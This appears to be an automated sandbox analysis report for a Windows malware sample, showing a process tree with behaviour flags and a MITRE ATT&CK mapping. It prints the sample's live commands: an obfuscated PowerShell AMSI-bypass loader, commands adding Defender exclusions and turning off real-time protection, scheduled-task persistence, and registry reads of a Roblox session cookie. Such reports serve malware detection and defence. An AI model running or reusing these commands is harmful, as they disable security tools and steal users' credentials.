  C:\Windows\System32\dllhost.exe /Processid:{49e990c2-b96a-4efd-b3e4-8c68b74f26ba}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3652

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:896

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1112

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1180
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AwSxkPIJJAyW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$viULjJaneOFgoE,[Parameter(Position=1)][Type]$HywweUOfax)$tcpewosFoPt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+'e'+''+'l'+'e'+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+'D'+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+'c'+[Char](44)+'S'+[Char](101)+'al'+[Char](101)+''+[Char](100)+''+','+'A'+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+','+'A'+'u'+'t'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$tcpewosFoPt.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+'lN'+[Char](97)+''+[Char](109)+''+'e'+''+','+''+[Char](72)+'ide'+[Char](66)+''+'y'+''+'S'+''+'i'+''+'g'+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$viULjJaneOFgoE).SetImplementationFlags('R'+[Char](117)+''+'n'+''+'t'+''+[Char](105)+'m'+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+'d'+'');$tcpewosFoPt.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+'e'+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+'t'+''+','+''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+''+'l'+'',$HywweUOfax,$viULjJaneOFgoE).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $tcpewosFoPt.CreateType();}$PkCrCYpVPEuKw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+'o'+''+[Char](102)+''+'t'+''+[Char](46)+''+'W'+''+'i'+''+[Char](110)+''+[Char](51)+''+'2'+'.'+'U'+''+[Char](110)+'s'+'a'+''+'f'+''+'e'+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+'e'+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$vNVfOFPjvzWEJI=$PkCrCYpVPEuKw.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KjvmLkEQFcFpsjShEBs=AwSxkPIJJAyW @([String])([IntPtr]);$CLXCaaVPhbfuYmEIXCeBDV=AwSxkPIJJAyW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$dxhAEsDBBvF=$PkCrCYpVPEuKw.GetMethod(''+'G'+'e'+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+'n'+''+[Char](101)+''+[Char](108)+'3'+'2'+''+[Char](46)+'d'+'l'+''+[Char](108)+'')));$zFuiQgIysvDznc=$vNVfOFPjvzWEJI.Invoke($Null,@([Object]$dxhAEsDBBvF,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$wiFExwGurkYEtfwsM=$vNVfOFPjvzWEJI.Invoke($Null,@([Object]$dxhAEsDBBvF,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+'l'+''+'P'+'r'+[Char](111)+''+[Char](116)+'ec'+'t'+'')));$pAuXrxr=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zFuiQgIysvDznc,$KjvmLkEQFcFpsjShEBs).Invoke(''+'a'+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$rCCUSlwRveMBzKVBr=$vNVfOFPjvzWEJI.Invoke($Null,@([Object]$pAuXrxr,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+'f'+'er')));$JRAIIKrGLL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wiFExwGurkYEtfwsM,$CLXCaaVPhbfuYmEIXCeBDV).Invoke($rCCUSlwRveMBzKVBr,[uint32]8,4,[ref]$JRAIIKrGLL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rCCUSlwRveMBzKVBr,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wiFExwGurkYEtfwsM,$CLXCaaVPhbfuYmEIXCeBDV).Invoke($rCCUSlwRveMBzKVBr,[uint32]8,0x20,[ref]$JRAIIKrGLL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](119)+'ww'+[Char](115)+''+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3688
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:464
- C:\Users\Admin\AppData\Roaming\XClient.exe
  C:\Users\Admin\AppData\Roaming\XClient.exe
  2⤵
  - Executes dropped EXE
  PID:3612
- C:\Users\Admin\AppData\Roaming\XClient.exe
  C:\Users\Admin\AppData\Roaming\XClient.exe
  2⤵
  - Executes dropped EXE
  PID:1700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1456
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:2660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1520

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1668

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1676

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1956

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:1784

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2108

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2796

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2820

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2992

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3368

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3440
- C:\Users\Admin\AppData\Local\Temp\rootkit.exe
  "C:\Users\Admin\AppData\Local\Temp\rootkit.exe"
  2⤵
  - Checks computer location settings
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3604
- - C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
    "C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.DeadSecObbbfuscation.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4864
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2500
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2452
- - C:\Users\Admin\AppData\Local\Temp\Modify.exe
    "C:\Users\Admin\AppData\Local\Temp\Modify.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4260
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3684
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1408
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4612
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:3364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3048
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:972
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4324
- - C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
    "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"
    3⤵
    - Executes dropped EXE
    PID:4312
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3560

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3784

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3940

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4256

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:2124

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2228

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3680

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2008

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4220

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3476

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1968

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:3232

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2936

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:1448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:852

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
1⤵
PID:3468

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:2560

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery